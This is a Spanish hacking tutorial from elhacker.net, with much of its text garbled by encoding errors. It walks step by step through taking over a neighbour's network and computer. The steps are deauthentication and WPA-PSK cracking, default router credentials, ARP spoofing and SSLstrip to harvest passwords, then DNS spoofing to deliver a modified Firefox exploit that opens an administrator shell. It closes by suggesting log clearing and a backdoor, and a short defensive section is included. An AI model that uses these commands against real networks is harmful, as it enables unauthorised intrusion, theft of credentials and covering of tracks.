Está en la página 1de 17

Ataque modelo

elhacker.net Antonio Snchez Camacho a.k.a. Kamsky, a.k.a. Adonis

+++++++++++++++++ + [0x00] Introducci n + +++++++++++++++++ !ueno, como indica el nom"re del #ost, $amos a tratar de delinear lo %ue #odr&a ser un ata%ue 'modelo( en un entorno com)n como #uede ser nuestra casa. *n la %ue mediante nuestra tar+eta ,i-i detectamos $arias redes a nuestro alrededor, al.una de la cual a#ro$echaremos #ara #oder conectarnos a ella, #re$ia ru#tura de su se.uridad, y una $ez conse.uido esto, ser ca#aces de extraer in-ormaci n de la red, como #or e+em#lo cuantos hosts se conectan a ella, sni--ar tr-ico, etc... / -inalmente nos haremos con el control total de al.uno de los hosts de la red. *sta .u&a0tutorial est hecha con mero carcter de a#rendiza+e #or #arte de los lectores y del %ue lo redacta, siendo desarrollado en un entorno local de la"oratorio en el %ue todo el material es le.&timo, ya sa"eis, hay %ue ser "uenos... 1# 2i idea es darle un as#ecto lo ms #rctico #osi"le, no enrollndome demasiado en conce#tos te ricos, %ue sin duda, la .ente %ue de $erdad est3 interesada, se ocu#ar de a#render. Antes de em#ezar $amos a #asar a comentar un #o%uito ms en detalle los #asos %ue iremos realizando1 [In]Se.uridad 4i-i1 Como todo el mundo sa"e, es com)n encontrar entre las redes de los $ecinos %ue muchas de estas est3n sin encri#taci n, o %ue usen 4*5, y las menos 45A65SK. 7ado %ue el ni$el medio de los usuarios %ue usan ordenadores suele ser de #er-il medio6"a+o 8$er el correo, el -ace"ook, ha"lar #or el msn, etc...9, no se #uede es#erar .ran cosa en cuanto a la se.uridad en su router inalm"rico, asi %ue nos a#ro$echaremos de ello #ara sacar la cla$e y #oder conectarnos a su misma red. :na $ez conse.uido esto, tam"i3n es $er muy com)n, %ue de"ido a la $a.ancia0de+adez de los t3cnicos %ue instalan la conexi n a internet, la contrase;a #or de-ecto de los routers #ermanece, cosa %ue tam"i3n a#ro$echaremos #ara conectarnos a la con-i.uraci n, y o"tener $aliosa in-ormaci n. *stamos dentro...1 :na $ez realizado el #aso anterior, ya estaremos en el mismo se.mento de red %ue los hosts le.&timos conectados al router inalm"rico, #or lo %ue nos a#ro$echaremos de esto #ara sni--ar tr-ico y o"tener ms datos de las $&ctimas, como #or e+em#lo1 #ass,ords de todo ti#o, in-ormaci n #ri$ada, etc... <ematando el asunto1 5ara -inalizar, des#u3s de reco#ilar toda la in-ormaci n %ue consideremos necesaria, la usaremos #ara conse.uir acceso de Administrador al host ele.ido, y hacernos con el control total de este.

++++++++++++++++++ + [0x0=] >erramientas + ++++++++++++++++++ 5ara lle$ar a ca"o todo este tutorial,me he montado un mini la"oratorio en casa1 <outer Inalm"rico Comtrend ? m%uinas $irtuales @24are1 :"untu A.0B, intruso 4indo,s C5 4u7e D.0, $&ctima ? tar+etas inalm"ricas1 i#,DEBF, usada #or la $&ctima #ara conectarse smc con chi#set atheros y dri$ers mad,i-i6n., usada #or el intruso >erramientas $arias #ara lle$ar a ca"o la intrusi n1 Aircrack6n., 4ireShark, dsni--, etc...

++++++++++++++++++++ + [0x0?] A.radecimientos + ++++++++++++++++++++ A.radecer al sta-- y la .ente de elhacker.net #or la cola"oraci n de una u otra -orma, en es#ecial a A$erno #or animarme a hacer cosillas como esta, es#ero en un -uturo #oder se.uir cola"orando en la -orma %ue se estime o#ortuna en este .ran -oro A mi no$ia #or a.uantar las horas y horas y ms horas %ue me tiro delante del ordenador sin %ue+arse 8no mucho 1#9

++++++++++++++++++++++ + [0x0D] [In]Se.uridad 4i-i + ++++++++++++++++++++++ Como ya comentamos anteriormente, es com)n encontrarnos la t&#ica red de los $ecinos, sin nin.)n ti#o de se.uridad, %uizs con 4e#, y en el me+or de los casos con 4#a04#a?. *n nuestro caso, $amos a centrarnos en la alternati$a ms 'di-&cil( %ue se nos #odr&a #resentar, es decir el caso en el %ue la red est3 #rote.ida con 4#a04#a? con 5SK 8Cla$e 5re6 Com#artida9, o"$iamente hay escenarios ms di-&ciles, como #or e+em#lo el uso de 4#a04#a? *m#resarial 8es decir, con el uso de un Ser$idor <adius9, #ero como su #ro#io nom"re indica, es una alternati$a %ue se usa casi exclusi$amente a ni$el em#resarial, y a $eces ni eso, #or lo %ue es altamente im#ro"a"le %ue nos encontremos con al.o de este ti#o. Aun%ue el dise;o de 4#a04#a? aun no ha sido com#rometido totalmente 8$eremos cuanto tarda9, si %ue nos #odemos a#ro$echar de sus im#lementaciones, en este caso el uso de Cla$es 5re6 Com#artidas no muy ro"ustas y %ue hacen %ue sea el esla" n d3"il de la cadena. *l #rimer #aso, ser la identi-icaci n del o"+eti$o, as& %ue sin ms dilaci n, $ayamos al .rano. 5ara ello, $amos ayudarnos de la herramienta wlanconfig #ara crear un inter-az de red $irtual en modo monitor, y a continuaci n con ayuda de airodump-ng em#ezaremos a $er lo %ue se cuece #or el $ecindarioG 1#
antonio@hack4free:~$ sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor antonio@hack4free:~$ iwconfig ath0 IEEE 802 !!g E""I#:$$ %ickname:$$ &ode:&onitor 'hannel:0 (ccess )oint: %ot*(ssociated antonio@hack4free:~+Escritorio+guia,elhacker+ca-turas$ sudo airodum-*ng *w vecinos ath0

Como $emos en la ima.en, hay "astante redes, una de ellas sin nin.)n ti#o de #rotecci n, $arias con 4*5, y el resto con 45A65SK, nosotros $amos a centrarnos en la red con *ssid 'CasaHAntonio(, %ue como $emos, tiene el ci-rado %ue and"amos "uscando. A continuaci n, $amos a -iltrar un #o%uito el asunto, limitndonos a ca#turar #a%uetes del canal en el %ue se encuentra la red citada1
antonio@hack4free:~+Escritorio+guia,elhacker+ca-turas*wifi$ sudo airodum-*ng *c 2 *w vecinos ath0

*l si.uiente #aso, ser conse.uir %ue el cliente conectado se cai.a, #ara %ue ten.a %ue $ol$er a autenticarse, y en ese momento ca#turar el B6,ay handshake, %ue usaremos #ara, mediante -uerza "ruta, sacar la 5SK y #oder conectarnos como si -u3semos un cliente le.&timo. I9 Como coment3 al #rinci#io, el o"+eti$o de esta .u&a es centrarnos en la #arte #rctica, #ero si al.uien est interesado en una ex#licaci n ms exacta y -ormal de la 'de"ilidad( de la 5SK, hace no mucho #oste3 en el su"-oro de hackin. ,ireless una .u&a de ata%ues a las di-erentes alternati$as en cuanto a la se.uridad en redes inalm"ricas se re-iere, entre la %ue se encuentra 45A65SK y una ex#licaci n "astante ms -ormal. 5rosi.amos, ahora, en una nue$a terminal o"li.aremos al cliente le.&timo a re6autenticarse #ara #oder ca#turar el handshake1
antonio@hack4free:~$ sudo aire-la.*ng *0 0 *a 00:!(:2/:42:0(:0( *c 00:!1:02:!0:!2:2/ ath0 !4:!0:03 4aiting for 5eacon frame 6/""I#: 00:!(:2/:42:0(:0(7 on channel 2 !4:!0:08 "ending 34 directed #e(uth "9&(': :00:!1:02:!0:!2:2/; : 0< 0 ('=s; !4:!0:08 "ending 34 directed #e(uth "9&(': :00:!1:02:!0:!2:2/; : 0< 0 ('=s; !4:!0:!0 "ending 34 directed #e(uth "9&(': :00:!1:02:!0:!2:2/; : 0< 0 ('=s;

J 7onde le indicamos %ue realice un ata%ue de desautenticaci n, contra el cliente 6c, conectado al A5 6a, y %ue lo ha.a inde-inidamente 8hasta %ue nosotros lo #aremos9. Como o"ser$amos en la $entana del airodum#, el cliente se cae, y al rato se $uel$e a conectar, momento en el %ue ya tenemos lo %ue %uer&amosG

*l )ltimo #aso ser conse.uir la 5SK mediante -uerza "ruta, #ero a esto de la -uerza "ruta, le #odemos a;adir un to%ue ele.ante1 <ain"o, Ka"les *stas son un ti#o de ta"las de ")s%ueda es#eciales %ue #ermiten recu#erar #ass,ords usando los hashes de estos. *stas ta"las estn "asadas en la teor&a de cam"io de tiem#o #or es#acio. Si %uereis ms in-ormaci n so"re las <ain"o, Ka"les #od3is echarle un $istazo a1 htt#100,,,.slideshare.net0.onal$mar0rain"o,6ta"les 8excelente #resentaci n a la %ue tu$e el #lacer de asistir en el )ltimo ase.urLIt9 htt#100en.,iki#edia.or.0,iki0<ain"o,Hta"le 5ara este ata%ue $oy a usar co45Atty, es una #ro.rama del ti#o aircrack #ero %ue a;ade ? -uncionalidades muy interesantes1 M Na #rimera es el uso en s& de las <ain"o, Ka"les, estar&a "ien usarlas #ara esta .u&a, #ero de"ido a %ue son ms de D0 O" y adems no accesi"les 8al menos no las he encontrado9 desde descar.a directa alar.ar&a mucho su descar.a M Na utilidad trae un #ro.rama llamado .en#mk, %ue se usa #ara #recom#utar los archi$os hash de -orma similar a como se hace en las <ain"o, Ka"les, y %ue es la herramienta %ue en con+unci n con co45Atty $amos a usar. *l #rimer #aso ser .enerar los hash -iles #ara un SSI7 en es#ec&-ico, en nuestro caso 'CasaHAntonio(1
antonio@hack4free:~+Escritorio+cow-att.*4 1$ +gen-mk f +etc+dictionaries*ommon+words *d hash,file *s >'asa,(ntonio?

Como $emos, usamos un diccionario del sistema, y %ue la salida se har al archi$o hashH-ile. :na $ez .enerado el hash -ile lo #odemos usar contra cual%uier red cuyo SSI7 sea 'CasaHAntonio(, y #rocedemos a ello1
antonio@hack4free:~+Escritorio+cow-att.*4 1$ +cow-att. *r ~+Escritorio+guia,elhacker+ca-turas* wifi+@ ca- *d hash,file *s >'asa,(ntonio?

A continuaci n $emos la salida del #ro.rama1

@oilPG /a tenemos la 5SK, asi %ue ya hemos conse.uido nuestro #rimer o"+eti$oG

++++++++++++++++++++ + [0x0B] *stamos dentro...+ ++++++++++++++++++++ :na $ez %ue nos conectamos a la red, el si.uiente #aso #odr&a ser #onernos directamente a sni--ar tr-ico, #ero antes de esto, trataremos de acceder a la con-i.uraci n del router, ya %ue si conse.uimos acceso #odremos reco#ilar in-ormaci n rele$ante, como I5 de los hosts conectados, ma#ear #uertos #ara hacer scans de #uertos a los host conectados, etc... Nos routers inalm"ricos suelen tenes un mini ser$idor htt# %ue #ro$ee acceso a la con-i.uraci n a tra$3s del #uerto A0, #ara cerciorarnos de esto1
antonio@hack4free:~$ ifconfig ath0 ath0 Aink enca-:Ethernet direcciBnC4 00:!1:f8:15:54:e0 inet direcciBn:!82 !3 82 !10 #ifusiBn: !82 !3 82 222 &Dscara:222 222 222 0 antonio@hack4free:~$ nc !82 !3 82 2 80 C99)+! ! 400 /ad EeFuest "erver: micro,htt-d 'ache*'ontrol: no*cache #ate: "atG 0! Han 2000 02:03:2! I&9 'ontent*9.-e: teJt+html 'onnection: close KC9&ALKCE(#LK9I9AEL400 /ad EeFuestK+9I9AELK+CE(#L K/M#N /I'MAMEO$Pcc0000$LKC4L400 /ad EeFuestK+C4L %o reFuest found 'M&9EE%# '9*213+CI*213Q KCEL K(##EE""L K( CEERO$htt-:++www acme com+software+micro,htt-d+$Lmicro,htt-dK+(L K+(##EE""L K+/M#NLK+C9&AL

No #rimero %ue hemos hecho es a$eri.uar %ue I# se nos ha asi.nado, y la mscara, #ara as& sa"er cual es la #uerta de enlace. :na $ez %ue sa"emos %ue es la !82 !3 82 2, nos conectamos al #uerto A0 con ayuda de netcat y $emos %ue nos ha 'escu#ido( in-ormaci n %ue nos #uede ser )til. *n #rimer lu.ar nos de$uel$e un error B00, #ero a continuaci n nos muestra el modelo del router, as& como el mini ser$idor 4e" %ue comentamos anteriormente 8microHhtt#d9. Ahora tenemos ? o#ciones1 !uscar una $ulnera"ilidad en el Ser$idor microHhtt#d, y tratar de ex#lotarla #ara conse.uir acceso. *sto no es muy di-&cil, "asta con "uscar un #oco en .oo.le y o"tenemos #or e+em#lo esto1 htt#100,,,.security-ocus.com0archi$e0=0BEEF0D 7onde se in-orma de $arias $ulnera"ilidades en este ser$idor, y ms en concreto en la im#lementaci n %ue corre so"re nuestro router, as& %ue s lo tendr&amos %ue leer un #o%uito y a#licar el ex#loit corres#ondiente #ara acceder. Na o#ci n '$a.a( es, ya %ue sa"emos el modelo concreto del router, "uscar #or internet las contrase;as #or de-ecto, ya %ue no suelen ser cam"iadas ni #or los usuarios ni #or los 't3cnicos( %ue hacen la instalaci n. 7icha ")s%ueda nos indica %ue1 Admin,Admin corres#one al User,Pass #or de-ecto.

As& %ue ahora ya mediante nuestro na$e.ador -a$orito, nos conectamos a la I# indicada anteriormente, introducimos la tu#la Admin,Admin y...

A%u& $emos la #antalla #rinci#al de con-i.uraci n, donde #odemos destacar cosas %ue nos #odr&an ser de .ran utilidad, como las ta"las QAK, el ma#eo de #uertos, la con-i.uraci n 4ireless...

:n #o%uita ms en detalle, la secci n de 4ireless, donde $emos %ue #odemos tocar toda la con-i.uraci n1 Qom"re de la red, Se.uridad, Riltrado 2AC, etc.. / en #antalla $emos como hay ? clientes conectados, el le.&timo, y nosotros... I9 *l )nico 'detalle( a comentar, es %ue en este ti#o de router no muestra las I#Ss de los hosts conectados, #ero esto como $eremos, no $a a resultar ser nin.)n #ro"lema. 5ara sacar la I# del host conectado nos ayudaremos de *tterca#. Su -uncionamiento es muy sim#le, nos $amos a la #esta;a Sni--6T :ni-ied Sni--in., y seleccionamos el inter-az adecuado. A continuaci n escaneamos todos los hosts %ue haya conectados, y los listamos 8#esta;a >ost9. U"teniendo el si.uiente resultado1

Nas ? #rimeras entradas corres#onden a inter-aces creadas #or $m,are a modo de router de la red $irtual, en nuestro caso $amos a tra"a+ar con la =V?.=W.V?.? como #uerta de enlace. Na Dera entrada corres#onde al host le.&timo 8nuestra $&ctima9. / -inalmente la )ltima direcci n la usa $m,are. As& %ue ya tenemos lo %ue %uer&amos1 <outer1 !82 !3 82 2 @&ctima1 !82 !3 82 !1! *l si.uiente #aso ser mediante ar#s#oo-in. hacernos #asar #or el router y hacer un 2i2 #ara ca#turar todo el tr-ico %ue #ase desde la $&ctima hasta el router y $ice$ersa. *sto con *tterca# es sencillo, sim#lemente nos #onemos encima de la I# del router y lo a;adimos a la lista de '$&ctimas( #ulsando el =, y a continuaci n a;adimos a la $&ctima #ulsando el ?. Rinalmente hacemos el ar# #oisonnin. 82itm X Ar# 5oisonnin.9, y em#ezamos a ca#turar #a%uetes 8*tterca# X Start Sni--in.9 Si ahora a"rimos el ,ireshark y em#ezamos a ca#turar tr-ico, -iltrando s lo el tr-ico de la I# $&ctima 8i#.addr YY =V?.=W.V?.=D=9, $eremos el tr-ico %ue .enera1

*n la ima.en #odemos $er el -iltro %ue hemos a#licado, y c mo la $&ctima ha entrado en la #.ina 4e" ,,,.as.com Si se.uimos ca#turando tr-ico, o"ser$aremos %ue se #uede leer en claro la in-ormaci n %ue no $a ci-rada, #or e+em#lo user y #ass de conexiones a RK5, #ero tam"i3n o"ser$amos %ue ha"r tr-ico ci-rado 8KNS, SSN $?9, %ue aun%ue $emos, no tiene sentido a#arente... @amos a tratar de remediar esto, #ara ello usaremos SslStri#, una ma.n&-ica herramienta %ue se sir$e de la #oca atenci n de los usuarios en su na$e.aci n, incluso cuando son cosas de alto $alor, como cuando na$e.amos #or la #.ina de nuestro !anco... No %ue hace es hacer un 2i2 entre el Ser$idor de turno y la $&ctima, de -orma %ue se conecta con el ser$idor mediante >KK5S, #ero sin em"ar.o el tr-ico con la $&ctima $a en texto #lano 8>KK59. Con todo lo anterior, y una $ez tenemos SslStri# en nuestra m%uina y se.uimos las instrucciones de se <*A72*, lo )nico %ue de"eremos de hacer ser1
antonio@hack4free:~$ sudo -.thon sslstri- -. *w ca-tura,sslstri- *s *l 2222 *k *f

Consi.uiendo %ue se .uarde s lo el tr-ico SSN en el archi$o ca#turaHsslstri#, escuchando las conexiones en el #uerto FFFF, matamos las conexiones existentes y usamos el icono del candadito. Ahora, en cuanto la $&ctima se conecte a al.una #.ina %ue use >KK5 so"re tls0ssl #odremos ca#turar todo como si -uese texto #lano. 5ara $er los resultados "asta con hacer un1
antonio@hack4free:~$ sudo tail *f ca-tura,sslstri-

y es#erar a %ue #i%ue el anzuelo... I9 o de una -orma ms .r-ica con el ,ireshark1

Como $emos, en este caso hemos ca#turado el #roceso de autenticaci n a una cuenta de correo, esto es s lo la #untita del ice"er., echarle ima.inaci n...

+++++++++++++++++++++++ + [0x0F] <ematando el asunto + +++++++++++++++++++++++ :na $ez %ue hemos ro"ado toda la in-ormaci n %ue consideremos o#ortuna, el )ltimo #asito ser hacernos con el control total del ordenador de la $&ctima. Nos #asos t&#icos son los si.uientes1 <eco#ilar in-ormaci n so"re los ser$icios0#ro.ramas %ue usa la $&ctima Centrarnos en uno e intentar "uscar una $ulnera"ilidad conocida *x#lotarla y hacernos con el control total *n la #osici n en la %ue nos encontramos, lo l .ico ser&a mediante nma# scanear el host, en "usca de ser$icios acti$os y $ulnera"les, #ero... 5uede %ue esto no ha.a -alta, como somos ex#ertos en se.uridad y estamos al d&a de los )ltimos "u.s, hemos leido en el -oro de elhacker.net %ue hay una $ulnera"ilidad en $ersi n D.F del na$e.ador 4e" Rire-ox, y la $ulnera"ilidad $a de la manita de un #ar de ex#loits #u"licados en mil,0rm. As& %ue $amos a #ro"ar suerte, con ayuda de ,ireshark $amos a analizar las ca"eceras de las #eticiones 4e"s en "usca de sa"er %ue na$e.ador usa la $&ctima y $er si hay suerte...

/ e-ecti$amente hemos tenido suerteG As& %ue manos a la o"ra... Si "uscamos en mil,0rm, tenemos ? ex#loits, el #rimero es una 5UC en la %ue s lo hace saltar la calculadora, #ero el se.undo est codi-icado en #ython y crea una conexi n al #uerto FF00 donde nos #odremos conectar remotamente con #ri$ile.ios de administrador... No %ue nosotros haremos ser usar el c di.o del #rimer ex#loit, #ero modi-icando el shellcode #or el del se.undo. :na $ez %ue tenemos el ex#loit, nos montaremos un A#ache en nuestro ordenador 8lo %ue he hecho yo9, o #odemos su"irlo a al.)n ser$icio de hostin. .ratuito. 5ara aca"ar, nos ayudaremos de nue$o del etterca# #ara hacer un 7QS #oisonin. y redireccionar #or e+em#lo la #.ina de .oo.le a nuestro ex#loit... Utra o#ci n ser&a #or e+em#lo usar un #roxy y cam"iar la #.ina %ue #ide la $&ctima #or la nuestra, en -in, hay in-inidad de -ormas de actuarG

*x#loits ori.inales1 htt#100,,,.mil,0rm.com0ex#loits0E?BV htt#100,,,.mil,0rm.com0ex#loits0E=A= No )nico %ue tenemos %ue hacer es cam"iar la shellcode del se.undo #or el del #rimero, si %uereis otro ti#os de #ayloads, siem#re os #odeis ayudar de metas#loit y su #.ina ,e", %ue es como un sastre a medida. 1d Qo $oy a #ararme en ex#licar como instalar el A#ache ya %ue no es el cometido de este art&culo, asi %ue su#oniendo %ue lo tenemos ya corriendo en nuestra m%uina y el ex#loit de"idamente colocado, continuemos. 5ara realizar el 7QS s#oo-in. con etterca#, lo #rimero ser modi-icar el archi$o de con-i.uraci n de nuestro '7QS local(, u"icado en1 +usr+share+etterca-+etter dns / de+aremos )nicamente esto1 Z..oo.le.Z A =V?.=W.V?.=D0 7onde le indicamos %ue mediante una entrada ti#o A de 7QS 8traducci n de nom"re de dominio a direcci n I#9, nos rediri+a al Ser$idor 4e" u"icado en nuestro hostG I9 *l si.uiente #aso ser irnos en etterca# a la #esta;a 5lu.ins6T 2ana.e the 5lu.ins y acti$amos dnsHs#oo-. Ahora s lo %ueda es#erar a %ue la $&ctima intente ir a .oo.le y...

*sta ser&a una $ista de las conexiones en el host $&ctima, antes y des#u3s de acceder su#uestamente a .oo.le, cuando en realidad corri el ex#loit.

*sta ser&a una ca#tura en la %ue $emos c mo nos conectamos desde nuestro host al #uerto %ue nos ha ha"ilitado el ex#loit en la $&ctima.

/ -inalmente $emos como #odemos na$e.ar a nuestro anto+o #or el sistema... somos administradoresGGG X CUQK<UN KUKAN

++++++++++++++++++++ + [0x0W] 7e-endi3ndonos + ++++++++++++++++++++ Ahora $amos a $er una serie de medidas, %ue la $&ctima #odr&a y de"er&a de ha"er tomado #ara %ue nada de lo %ue ha #asado hu"iera sucedido...o al menos %ue no nos hu"iese resultado tan sencilloG [In]Se.uridad 4i-i1 *l #rimer #aso a realizar si #retendemos %ue nuestra Nan ho.are;a sea se.ura, o al menos lo #arezca, es #rote.er adecuadamente nuestro A5 de conexiones no deseadas. No ideal ser&a usar 45A? *nter#rise, #ero #ara %ue nos $amos a en.a;ar, estamos ha"lando de una conexi n casera, el instalar y mantener un Ser$idor <adius no ser&a ni $ia"le ni #rctico en el EE[ de los casos. 5artiendo de este #unto, yo recomendar&a eso si, %ue se use 45A?, #ero en su 'edici n casera(, es decir, con 5SK. 5ero dir3is1 'Si eso es lo %ue usa"a la $&ctima(, y es cierto, #ero es %ue no sir$e con "lindar tu casa con una #uerta de acero de =0 cm de .rosor, si lue.o te de+as las lla$es #uestas... *l uso de 5SK, #ara %ue sea -ia"le, conlle$a %ue la cla$e sea <U!:SKA, no como en el caso %ue hemos $isto, as& %ue ya sa"3is 45A? + 5SK ro"usta Y tran%uilidad 8de momento9. / "ueno, #ara los ms #aranoicos, no ol$id3is de cam"iar esta cla$e cada cierto tiem#o... *l si.uiente #aso es tratar de restrin.ir el acceso a la con-i.uraci n de nuestro router. 5ara ello $arias cosas1 si nos -i+amos, el m3todo %ue usamos #ara conse.uir in-ormaci n acerca del router -ue conectarnos con ayuda de netcat, y %ue el A5 nos 'escu#iera( in-ormaci n. 5ara e$itar esto, no nos tenemos %ue ol$idar de cam"iar los "anners #recon-i.urados %ue muestra el A5, #ara as& e$itar dar in-ormaci n %ue en este caso sir$i #ara a$eri.uar el modelo del router. :n #asito ms es, ya %ue los 't3cnicos( %ue nos suelen instalar el A5 y con-i.urar la conexi n no se molestan, es cam"iar las contrase;as #or de-ecto de acceso a la con-i.uraci n, con esto se lo #ondremos un #o%uito ms di-&cil a los malosG *stamos dentro...1 5ara e$itar el Ar# S#oo-in., y todo lo %ue esto conlle$a, hay $arias #osi"ilidades. Na ms sencilla y -acti"le en un entorno #e%ue;o es, mantener las ta"las As# de -orma esttica, con esto hacemos im#osi"le la modi-icaci n de las ta"las #or terceros, y nos e$itamos %ue nos la cuelen como ha sido el caso. Sin em"ar.o, hay ocasiones en las %ue esto no es -acti"le, ima.inaos tener %ue estar manteniendo a mano una ta"la con ms de =00 hosts, no es #rctico. !ueno, no #asa nada, siem#re #odemos echar mano de otras o#ciones, como #or e+em#lo de nuestro I7S -a$orito, el cual detectar un tr-ico de #a%uetes A<5 continuo y excesi$o 8as& es como suelen tra"a+ar los #ro.ramas como etterca# y ar#s#oo-9 hacia nuestro host #or #arte de un tercero, el cual ser "anneado y adi s muy "uenas. Kam"i3n hay al.unos #ro.ramitas curiosos %ue nos #ueden ser$ir de ayuda, como son ar#,atch y -ra.router, os recomiendo %ue les ech3is un $istazo. Si esto no es su-iciente, siem#re #odemos tomar otras #recauciones, como #or e+em#lo tratar de encri#tar los datos %ue mandamos en la medida de lo #osi"le, contra ms sensi"les sean ms #recauci n de"emos de tener.

*n el caso %ue hemos $isto, el atacante se a#ro$echa de un incauto, %ue ni si%uiera se -i+a en si realmente las conexiones %ue de"er&an ser se.uras 8htt#s9 lo son, es muy im#ortante %ue cuando nos metamos en #.inas donde hay datos #ri$ados y %ue #or lo tanto usan tls0ssl $? nos cercioremos de %ue realmente estamos en una conexi n se.uraG *s decir, %ue se #on.a la direcci n con el -ondo de color, %ue a#arezca el candadito, %ue la url sea de la -orma1 htt#s100... Aun as& #uede ha"er casos en los %ue nos intenten colar certi-icados %ue no son $lidos y cosas #or el estilo, #ara e$itar esto, hay una extensi n muy "uena #ara -ire-ox %ue se llama 5ers#ecti$es, os la recomiendo. 5ara -inalizar, y ya %ue estamos ha"lando de extensiones de Rire-ox, os comenta las %ue yo ten.o instaladas en cuanto a temas de se.uridad se re-ieren1 5ers#ecti$es, "uen&sima QoScri#t, como estn las cosas #or ah& -uera...me+or #re$enirG Roxy5roxy + Kor, hay $eces %ue no %ueremos %ue se#an %ue -uimos nosotros... 1# o sim#lemente, %ueremos #ermanecer an nimos Sho,I#, muestra la0las I50I5s de la #.ina donde estamos <ematando el asunto1 / -inalmente, lo ms im#ortante, #ero %uizs lo ms tra"a+oso y #esado, mantenernos al d&a de las $ulnera"ilidades %ue $an sur.iendo, y a#licar los #arches adecuados. Si la $&ctima hu"iese estado al tanto de la $ulnera"ilidad en Rire-ox, ha"r&a actualizado a la $ersi n D.F.= donde el "u. ya ha sido corre.ido, y nos ha"r&a #uesto las cosas un #oco ms di-&ciles. *s $ital, re#ito, @IKAN, mantenernos actualizados y actualizar nuestros #ro.ramas, #or%ue si no, lue.o #asa lo %ue #asa...

+++++++++++++++++ + [0x0V] 5ara aca"ar + +++++++++++++++++ >emos $isto "astante detalladamente c mo #asito a #asito, hemos #asado de estar aislados, a conectarnos a la red del '$ecino(, conse.uir in-ormaci n #ri$ile.iada, y #or )ltimo acceso total a su ordenador como administrador. 5or su#uesto %ue s lo he de+ado #inceladas de lo %ue se #uede lle.ar a conse.uir durante todo el #roceso, ahora s lo -alta %ue le ech3is un #oco de ima.inaci n... Como )ltimo #aso, %uedar&a lim#iar los lo.s del sistema #or si acaso, y o#cionalmente ha"ilitarnos una #uerta trasera #ara no tener %ue echar mano del ex#loit cada $ez %ue %ueramos conectarnos, #ero creo %ue ya ha sido su-iciente #or hoy, eso %ueda como tarea #ara el %ue %uiera matr&cula de honorG 17 :n saludo a todos Antonio Snchez Camacho a.k.a. Kamsky, a.k.a. Adonis

También podría gustarte